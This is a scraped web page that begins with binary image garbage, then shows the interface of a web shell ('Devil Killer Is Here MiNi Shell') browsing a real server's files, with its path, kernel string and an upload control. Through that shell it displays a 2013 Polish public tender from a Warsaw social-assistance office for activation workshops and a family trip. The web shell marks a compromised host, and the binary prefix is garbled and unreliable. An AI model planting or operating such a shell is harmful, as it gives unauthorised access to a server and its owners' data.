JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130311/96536-N-2013.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie warsztatów aktywizacyjnych dla uczestników projektu systemowego Dobra marka - OPS Ursynów budzi do życia. Nr postępowania: OPS.DA.2711.5.2013</b><br>
<b>Numer ogłoszenia: 96536 - 2013; data zamieszczenia: 11.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursynów m.st.  Warszawy , ul. Cybisa 7, 02-784 Warszawa, woj. mazowieckie, tel. 0-22 544 12 00, faks 0-22 544 12 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-ursynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów aktywizacyjnych dla uczestników projektu systemowego Dobra marka - OPS Ursynów budzi do życia. Nr postępowania: OPS.DA.2711.5.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia. Termin i miejsce realizacji przedmiotu zamówienia.
1. Przedmiotem zamówienia jest przeprowadzenie warsztatów aktywizacyjnych dla uczestników projektu systemowego Dobra marka - OPS Ursynów budzi do życia, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2. Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV) określa kod: 80570000-0 (Usługi szkoleniowe w dziedzinie rozwoju osobistego). 
55100000-1 (Usługi hotelarskie).
55270000-3 (Usługi świadczone przez placówki oferujące wyżywienie i miejsca noclegowe).
60172000-4 (Wynajem autobusów i autokarów wraz kierowcą). 
3. Przedmiot zamówienia obejmuje przeprowadzenie :
Część  I. Warsztaty stacjonarne - 235 godzin lekcyjnych następujących warsztatów aktywizacyjnych i konsultacji z zakresu umiejętności wychowawczych dla 40 uczestników projektu Dobra marka - OPS Ursynów budzi do życia, w terminie od  dnia podpisania umowy do 31 maja 2013 r.,  poza siedzibą Ośrodka, w lokalu zapewnionym przez Wykonawcę, na terenie Dzielnicy Ursynów, zarówno w tygodniu jak i w weekendy, 
w godzinach przedpołudniowych i popołudniowych, o tematyce: 
- Skuteczna komunikacja - 24 godziny lekcyjne, 
- Skuteczne rozwiązywanie konfliktów - 16 godzin lekcyjnych,   
- Asertywność - 24 godziny lekcyjne, 
- Radzenie sobie ze stresem - 8 godzin lekcyjnych,  
- Trening kontroli złości - 16 godzin lekcyjnych, 
- Skuteczna motywacja - 8 godzin lekcyjnych, 
- Zarządzanie czasem  - 16 godzin lekcyjnych, 
- Warsztat budowania pewności siebie - 12 godzin lekcyjnych, 
- Warsztaty umiejętności wychowawczych - 30 godzin lekcyjnych i do 20 godzin indywidualnych konsultacji, 
- Zarządzanie gospodarstwem domowym - 16 godzin lekcyjnych, 
- Warsztaty aktywnego poszukiwania pracy - 45 godzin lekcyjnych, 

Część II. Wyjazdowy warsztat motywacyjno-integracyjny - 10 godzin lekcyjnych. 
- Warsztat wyjazdowy odbędzie się w weekend, w terminie 13.04-14.04.2013 r., w okolicach Jeziora Zegrzyńskiego: Białobrzegi/Jachranka/Zegrze. 
- Przewidywana liczba osób: 47 osób, w tym: 28 osób dorosłych (w tym 2 pracowników Ośrodka Pomocy Społecznej Dzielnicy Ursynów) i 19 dzieci (w tym 3 dzieci w wieku od 3 do 4 lat oraz 16 dzieci w wieku od 5 do 16 lat). 
Wykonawca zapewni:
a) transport uczestników projektu (osoby dorosłe i dzieci oraz 2 pracowników Ośrodka), autokarem  o podwyższonym standardzie (toaleta, klimatyzacja/ogrzewania, regulowane oparcia foteli),  z Warszawy terenu dzielnicy Ursynów do miejsca realizacji usługi i z powrotem oraz pomiędzy miejscami zwiedzania;
b) nocleg i wyżywienie dla całej grupy. Zamawiający wymaga aby zakwaterowanie wszystkich uczestników miało miejsce w jednym budynku. Miejscem zakwaterowania ma być ośrodek, pensjonat itp., w którym zostanie zagwarantowany nocleg i wyżywienie dla całej grupy. Ośrodek powinien być dostosowany do pobytu dzieci - ogrodzony teren i plac zabaw przy ośrodku. Na terenie ośrodka powinna znajdować się sala szkoleniowa wyposażona w niezbędny sprzęt, w szczególności: flip-chart 
wraz z pisakami, ekran, rzutnik oraz sala do prowadzenia zajęć z dziećmi; 
c) wyżywienie dla całej grupy podczas pobytu w miejscu realizacji usługi: 13.04.2013 r.- obiad oraz kolacja, 14.04.2013 r. -śniadanie i obiad oraz poczęstunek pierwszego i drugiego dnia podczas warsztatów dla uczestników (kawa, herbata, soki, woda, owoce oraz ciastka) i dla dzieci; 
d) opiekę dla dzieci uczestników warsztatów podczas trwania zajęć wraz 
z materiałami edukacyjnymi (np.: kredki, zabawki, książki itp.); 
e) wycieczkę do Serocka (pierwszego dnia) - zwiedzanie Kościoła Zwiastowania NMP, spacer po Rynku i spacer nad Narwią, 
f) wycieczkę do Pułtuska (drugiego dnia) - zwiedzanie Bazyliki katedralnej NMP, Domu Polonii, Muzeum Regionalnego,
g) przewodnika i bilety wstępu do miejsc zwiedzania,  
h) ubezpieczanie 47 uczestników wyjazdu od NNW 
- Wykonawca pokrywa koszty związane z transportem, noclegiem i wyżywieniem trenerów i obsługi wyjazdu. 
- Koszt usługi będzie uzależniony od rzeczywistej liczby osób, które wezmą udział 
w wyjeździe. 
- Na 7 dni przed wyjazdem Zamawiający przekaże ostateczną liczbę uczestników.
4. Szczegółowy opis przedmiotu zamówienia określony został w załączniku Nr 1 
do SIWZ; 
5. W związku z niemożnością dokładnego określenia wielkości zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia maksymalnie o 20 % liczby osób (dotyczy części II przedmiotu zamówienia) oraz liczby godzin usług (dotyczy części I przedmiotu zamówienia) podanych w ust 3. Ewentualne zmniejszenie wielkości zamówienia nie będzie skutkowało odpowiedzialnością Zamawiającego. 
6. Wartość przedmiotu zamówienia w odniesieniu do części I będzie iloczynem podanej przez Wykonawcę ceny 1 godziny usługi brutto i przewidywanej (w okresie trwania umowy) liczby godzin usług, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 godz. usługi i faktycznej liczby wypracowanych godzin usług. 
7. Wartość przedmiotu zamówienia w odniesieniu do części II będzie iloczynem podanej przez Wykonawcę ceny za 1 osobę brutto i przewidywanej (w okresie trwania umowy) liczby osób uczestniczących w wyjeździe, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 wartości przypadającej na 1 osobę i faktycznej liczby osób uczestniczących w wyjeździe. 
8. Uzupełnieniem opisu przedmiotu zamówienia są warunki zawarte we wzorze umowy stanowiącym Załącznik nr 8 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zgodnie z dyspozycją art. 67 ust. 1 pkt 6 uprzejmie informuje, iż przewiduje możliwość udzielenia zamówień uzupełniających (dotyczy I części  przedmiotu zamówienia). 
Przedmiotem ewentualnych zamówień uzupełniających będą usuługi tego samego rodzaju co przedmiot zamówienia (Część I), w wielkości nie przekraczającej 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.10.00.00-1, 55.27.00.00-3, 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia przez Wykonawcę wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania oferty, a jeżeli okres prowadzenia działalności 
jest krótszy, w tym okresie, wykonał lub wykonuje (dot. świadczeń okresowych 
lub ciągłych) :
- dla części I przedmiotu zamówienia co najmniej 3 warsztaty umiejętności społecznych i 3 warsztaty aktywnego poszukiwania pracy i/ 1 warsztat  umiejętności wychowawczych, na łączną kwotę 10 000,00 zł brutto, których należyte wykonanie potwierdzone zostanie referencjami,
- dla części II przedmiotu zamówienia co najmniej 2 warsztaty wyjazdowe, na łączną kwotę 15 000,00  zł brutto, których należyte wykonanie potwierdzone zostanie referencjami,  
Uwaga : Wykonawca składając ofertę na dwie części przedmiotu zamówienia musi spełniać dwa warunki, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje co najmniej : 
A. Dla I części przedmiotu zamówienia - dwoma trenerami zdolnymi do wykonania przedmiotu zamówienia, niekaranymi, którzy ukończyli kurs umiejętności trenerskich oraz posiadają minimum 2 - letnie doświadczenie w prowadzeniu warsztatów aktywizacyjnych i w tym czasie zrealizowali lub realizują, co najmniej: 
- 3 usługi polegające na przeprowadzeniu warsztatów umiejętności społecznych, 
- 3 usługi polegające na przeprowadzeniu warsztatów aktywnego poszukiwania pracy 
- 1 usługę polegającą na przeprowadzeniu warsztatów umiejętności wychowawczych, 
B. Dla części II przedmiotu zamówienia :
a) dwoma trenerami zdolnymi do wykonania przedmiotu zamówienia, niekaranymi, którzy ukończyli kurs umiejętności trenerskich oraz posiadają minimum 2 - letnie doświadczenie w prowadzeniu warsztatów aktywizacyjnych i w tym czasie zrealizowali lub realizują, co najmniej : 
- 3 usługi polegające na przeprowadzeniu warsztatów umiejętności społecznych, 
- 3 usługi polegające na przeprowadzeniu warsztatów aktywnego poszukiwania pracy, 
b) trzema osobami z wykształceniem pedagogicznym lub w trakcie realizacji studiów pedagogicznych, posiadających min. 2-letnie doświadczenie w sprawowaniu opieki  nad dziećmi w różnych grupach wiekowych. 
Wykonawca  przedstawi przed podpisaniem umowy program zajęć opiekuńczo-integracyjnych dla dzieci z uwzględnieniem grup wiekowych. Po akceptacji Zamawiającego program będzie realizowany podczas pobytu w miejscu realizacji usługi. 
Trenerzy warsztatów aktywizacyjnych muszą posiadać doświadczenie w pracy 
z osobami zagrożonymi lub wykluczonymi społecznie.
Uwaga : Wykonawca składając ofertę na dwie części przedmiotu zamówienia musi spełniać dwa warunki, o których mowa powyżej z zastrzeżeniem, że trenerami wyznaczonymi do realizacji warsztatów zarówno części I jak i II mogą być te same osoby</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 pkt 1 - 4 ustawy Pzp, sporządzone według treści Załącznika Nr 3 do SIWZ( dokument w oryginale); 
- aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert (dokument w oryginale lub poświadczony za zgodność z oryginałem); 
- oświadczenie o przynależności do grupy kapitałowej, o którym mowa w art. 26 ust 2d ustawy PZp ,wg wzoru Załącznika Nr 7 do SIWZ (dokument w oryginale); 
- oryginały pełnomocnictw, o których mowa w rozdziale IV ust. 3 i rozdziale VI ust. 6 SIWZ (o ile ustanowiono), dopuszcza się kopie notarialnie potwierdzone</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie zawodowe osób wykonujących przedmiot zamówienia jako trener warsztatów aktywizacyjnych - 20</li>
<li>3 - doświadczenie zawodowe osób wykonujących przedmiot zamówienia w pracy z osobami zagrożonymi lub wykluczonymi społecznie - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany umowy w rozumieniu art. 144 ust. 1 ustawy Pzp w przypadku zmiany prawa lub wystąpienia innych okoliczności, których nie można 
było przewidzieć, a które uniemożliwiałyby wykonanie  umowy zgodnie z jej treścią
 i celem w szczególności:
a) zmiany stawki podatku VAT w przypadku zmiany przepisów ustawy o podatku 
od towaru i usług i podatku akcyzowym w odniesieniu odpowiednio do całości 
lub danej części wartości zamówienia, którego zmiana dotyczy, przy czym wartość brutto określona w umowie jest wartością stałą.  
b) obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany. 
7. Każdorazowa zmiana treści umowy musi mieć formę pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Dzielnicy Ursynów m.st. Warszawy, ul. Cybisa 7, pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2013 godzina 12:00, miejsce: Siedziba Zamawiającego - Ośrodek Pomocy Społecznej Dzielnicy Ursynów m.st. Warszawy, ul. Cybisa 7, Punkt Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemow Dobra marka - OPS Ursynów budzi do życia realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty stacjonarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  I. Warsztaty stacjonarne - 235 godzin lekcyjnych następujących warsztatów aktywizacyjnych i konsultacji z zakresu umiejętności wychowawczych dla 40 uczestników projektu Dobra marka - OPS Ursynów budzi do życia, w terminie od  dnia podpisania umowy do 31 maja 2013 r.,  poza siedzibą Ośrodka, w lokalu zapewnionym przez Wykonawcę, na terenie Dzielnicy Ursynów, zarówno w tygodniu jak i w weekendy, w godzinach przedpołudniowych i popołudniowych, o tematyce: 
- Skuteczna komunikacja - 24 godziny lekcyjne, 
- Skuteczne rozwiązywanie konfliktów - 16 godzin lekcyjnych,   
- Asertywność - 24 godziny lekcyjne, 
- Radzenie sobie ze stresem - 8 godzin lekcyjnych,  
- Trening kontroli złości - 16 godzin lekcyjnych, 
- Skuteczna motywacja - 8 godzin lekcyjnych, 
- Zarządzanie czasem  - 16 godzin lekcyjnych, 
- Warsztat budowania pewności siebie - 12 godzin lekcyjnych, 
- Warsztaty umiejętności wychowawczych - 30 godzin lekcyjnych i do 20 godzin indywidualnych konsultacji, 
- Zarządzanie gospodarstwem domowym - 16 godzin lekcyjnych, 
- Warsztaty aktywnego poszukiwania pracy - 45 godzin lekcyjnych
Szczegółowy opis przedmiotu zamówienia określony został w załączniku Nr 1 
do SIWZ.
W związku z niemożnością dokładnego określenia wielkości zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia maksymalnie o 20 % liczby osób (dotyczy części II przedmiotu zamówienia) oraz liczby godzin usług (dotyczy części I przedmiotu zamówienia) podanych w ust 3. Ewentualne zmniejszenie wielkości zamówienia nie będzie skutkowało odpowiedzialnością Zamawiającego. 
Wartość przedmiotu zamówienia w odniesieniu do części I będzie iloczynem podanej przez Wykonawcę ceny 1 godziny usługi brutto i przewidywanej (w okresie trwania umowy) liczby godzin usług, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 godz. usługi i faktycznej liczby wypracowanych godzin usług. 
Wartość przedmiotu zamówienia w odniesieniu do części II będzie iloczynem podanej przez Wykonawcę ceny za 1 osobę brutto i przewidywanej (w okresie trwania umowy) liczby osób uczestniczących w wyjeździe, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 wartości przypadającej na 1 osobę i faktycznej liczby osób uczestniczących w wyjeździe. 
Uzupełnieniem opisu przedmiotu zamówienia są warunki zawarte we wzorze umowy stanowiącym Załącznik nr 8a i 8b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. b)	doświadczenie zawodowe osób wykonujących przedmiot zamówienia jako trener warsztatów aktywizacyjnych - 20</li>
<li>3. doświadczenie zawodowe osób wykonujących przedmiot zamówienia w pracy z osobami zagrożonymi lub wykluczonymi społecznie - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyjazdowy warsztat motywacyjno-integracyjny.</p>
